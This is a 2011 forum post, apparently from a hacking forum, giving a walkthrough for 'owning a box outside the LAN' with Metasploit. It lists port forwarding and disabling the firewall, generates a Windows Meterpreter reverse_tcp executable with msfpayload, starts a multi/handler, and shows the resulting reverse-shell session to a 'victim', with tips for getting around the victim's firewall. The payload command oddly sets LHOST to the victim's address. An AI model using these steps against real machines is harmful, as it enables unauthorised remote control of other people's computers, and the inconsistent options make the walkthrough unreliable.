Metasploit attack outside Lan

Started by ghostdog, January 29, 2011, 08:19:37 PM


ghostdog

Hi everyone

Owning a box outside the LAN is not as easy as doing it on the LAN; you need to modify a few things, as I will show you:

1) We need to forward a port on your router to be able to get the reverse connection. Port example: 4444
   If you don't know how to forward, go to: www.portforward.com

2) We need to shut down our local firewall:

ghostdog@Pentest-Lab:~$ sudo su
[sudo] password for ghostdog:
root@Pentest-Lab:/home/ghostdog# ufw disable
Firewall stopped and disabled on system startup


3) Make a new directory called /pentest/exploits/; as "root", copy framework3 from /opt into /exploits.

4) We need to modify the payload that we are going to use to attack the remote machine:

root@Pentest-Lab:/home/ghostdog# /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=VICTIM-IP X > /root/incercate.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=VICTIM-IP

root@Pentest-Lab:/home/ghostdog#

5) We launch the exploit ------>>>>>>

#    # ###### #####   ##    ####  #####  #       ####  # #####
##  ## #        #    #  #  #      #    # #      #    # #   #
# ## # #####    #   #    #  ####  #    # #      #    # #   #
#    # #        #   ######      # #####  #      #    # #   #
#    # #        #   #    # #    # #      #      #    # #   #
#    # ######   #   #    #  ####  #      ######  ####  #   #



      =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 644 exploits - 328 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
      =[ svn r11655 updated yesterday (2011.01.27)

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.104
LHOST => 192.168.1.104
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.104:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to VICTIM-IP
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> VICTIM-IP:37244) at Sat Jan 29 18:05:30 +0200 2010


GAME OVER

Now a few tips in case this doesn't work:
***Turn off your firewall.
***Check if the victim's firewall blocks the reverse shell.
***Check your router firewall settings.


PS: Replace VICTIM-IP with the proper IP, e.g. 82.218.110.114

Happy Hacking
GD ;)